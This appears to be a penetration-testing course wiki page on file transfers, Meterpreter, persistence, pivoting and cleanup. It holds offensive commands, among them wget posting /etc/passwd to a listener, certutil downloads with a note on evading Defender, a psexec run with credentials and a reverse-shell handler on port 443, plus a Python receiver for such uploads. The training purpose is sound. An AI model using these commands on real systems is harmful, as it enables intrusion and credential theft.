Week 11: File Transfers, Pivoting, Reporting

File Transfers, Pivoting, Report Writing, and Career Advice

Maintaining Access / Pivoting / Cleanup - This lesson discusses methods of maintaining access on a network, pivoting into other networks, and how to properly clean up as you exit a network.

The Legal Side of the House - This lesson covers the important legal aspects that a pentester must know before conducting a penetration test. For example, having a rules of engagement document that specifies which networks can be attacked and what attack methods can be used. Knowing the common legal documents that a junior pentester may encounter will give him or her an advantage early in their career.

Report Writing - This lesson covers the importance of report writing in penetration testing and walks through what should be included in a penetration test report. A demo penetration test report is provided that covers many of the findings discussed in prior chapters. This gives students a clear understanding of what is expected in a penetration test report and how to write one effectively.

File Transfers

Linux

# HOST FILES
python -m SimpleHTTPServer 80
# OR
python3 -m http.server 80
python -m pyftpdlib -p 21 # FTP (pyftpdlib must be installed)

# GRAB FILES
wget http://<ip>:80/secrets.txt
# RECEIVE FILES
nc -nvlp <port> > file # redirect the listener's output into a new file
# SEND FILES
## nc
nc <ip> <port> < file
## wget (POST to a listener); the receiver gets the HTTP request headers in front of the file and has to clean them off
wget --post-file=/etc/passwd 192.168.202.128:8081
tail -n +10 file > clean_file # strip the header lines; adjust the count to the headers you actually received
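
As an added example (not part of the course or this wiki), a small Python receiver that does what the nc listener plus tail -n +10 does above, but exactly: it parses the request wget --post-file sends, cuts the body at Content-Length instead of guessing a header line count, and returns a SHA-256 you can compare with sha256sum on the sending host. The port, output path and the sample request are assumptions.

```python
import hashlib
import socket

def split_http_post(raw: bytes, at_eof: bool = True) -> bytes:
    """Body of a raw HTTP POST (what `wget --post-file` sends), honoring Content-Length."""
    head, sep, rest = raw.partition(b"\r\n\r\n")
    if not sep:
        raise ValueError("incomplete HTTP headers")
    length = None
    for line in head.split(b"\r\n")[1:]:          # skip the request line
        name, _, value = line.partition(b":")
        if name.strip().lower() == b"content-length":
            length = int(value.strip())
    if length is None:                            # body runs until the peer closes
        if not at_eof:
            raise ValueError("no Content-Length; need end of stream")
        return rest
    if len(rest) < length:
        raise ValueError(f"short body: {len(rest)} of {length} bytes")
    return rest[:length]                          # drop anything after the declared body

def sha256_hex(data: bytes) -> str:
    """Hex SHA-256, to compare with `sha256sum` on the sending host."""
    return hashlib.sha256(data).hexdigest()

def receive_post_file(port: int, out_path: str) -> str:
    """Accept one wget --post-file upload on `port`, save the exact body, return its SHA-256."""
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as srv:
        srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        srv.bind(("0.0.0.0", port))
        srv.listen(1)
        conn, _ = srv.accept()
        with conn:
            raw, body = b"", None
            while body is None:
                chunk = conn.recv(65536)
                raw += chunk
                try:
                    body = split_http_post(raw, at_eof=not chunk)
                except ValueError:
                    if not chunk:                 # stream ended mid-request
                        raise
            conn.sendall(b"HTTP/1.1 200 OK\r\nContent-Length: 0\r\nConnection: close\r\n\r\n")  # let wget exit
    with open(out_path, "wb") as fh:
        fh.write(body)
    return sha256_hex(body)

# Constructed sample request (not a real capture) for offline checks.
SAMPLE_REQUEST = (b"POST / HTTP/1.1\r\nHost: 192.168.202.128:8081\r\nContent-Length: 12\r\n\r\n"
                  b"root:x:0:0:\n")
```

Run receive_post_file(8081, "clean_file") on the receiving host before issuing the wget command; the returned hash should match sha256sum /etc/passwd on the sender.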

Windows

# Windows Defender can block this, though there are ways to split files to bypass it
# GRAB FILES - HTTP
C:\Users\fcastle>certutil -urlcache -f http://<ip>/secrets.txt secrets.txt

# GRAB FILES - FTP
C:\Users\fcastle>ftp <ip>
ftp> get <file>

Meterpreter

msf5 > use windows/smb/psexec
msf5 exploit(windows/smb/psexec) > set rhosts 192.168.202.134
msf5 exploit(windows/smb/psexec) > set smbdomain marvel
msf5 exploit(windows/smb/psexec) > set smbpass Password1
msf5 exploit(windows/smb/psexec) > set smbuser fcastle
msf5 exploit(windows/smb/psexec) > set target 2
msf5 exploit(windows/smb/psexec) > run
...
meterpreter > cd c:\\users
meterpreter > upload /root/files/secrets.txt c:\\secrets.txt
meterpreter > download c:\\secrets.txt secrets.txt

Maintaining Access

Persistence is dangerous and usually unnecessary for junior- to mid-level pentesting (time-limited engagements, not red teaming). It opens a port on a machine with no credentials, leaving it wide open for a future attacker. You then have to go back in, delete the service and remove it from the registry. The persistence script does give you an RC (resource) file that deletes those files for you, but it remains dangerous and generally unnecessary.

Persistence Scripts

meterpreter > run persistence -h
exploit/windows/local/persistence
exploit/windows/local/registry_persistence

If you want to get a meterpreter shell back, set up a handler that matches the persistence payload:

msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
# might set lport to a well-known port (443) to be less conspicuous
msf5 exploit(multi/handler) > set lport 443
msf5 exploit(multi/handler) > set lhost 192.168.202.128
msf5 exploit(multi/handler) > run

Scheduled Tasks

run scheduleme
run schtaskabuse

Metsvc

run metsvc -A

Pivoting

Suppose you have gained access to a machine on the 192.168.x.x network that is dual-homed on a 10.x.x.x network (in VirtualBox this only requires giving the VM two network adapters).

# Check for other networks, besides ipconfig
route print
arp -a
netstat

Scanning through a pivot is incredibly slow, but it can be done with Metasploit's TCP port scanner:

use auxiliary/scanner/portscan/tcp

Cleanup

The cleanup process covers what must be done to restore systems once the penetration test is complete; it does not mean removing logs. It includes all user accounts and binaries used during the test.

  • Remove all executables, scripts and temporary files from compromised systems. If possible, use a secure-delete method to remove the files and folders.

  • Restore system settings and application configuration parameters to their original values if they were modified during the assessment.

  • Remove all backdoors and/or rootkits installed.

  • Remove any user accounts created for connecting back to compromised systems.

The Legal Side

Report Writing

Career Advice


Linked resources:

  • Sample report: "Demo Company - Security Assessment Findings Report.docx" in the GitHub repository hmaverickadams/TCM-Security-Sample-Pentest-Report
  • LEGAL / DOCUMENTS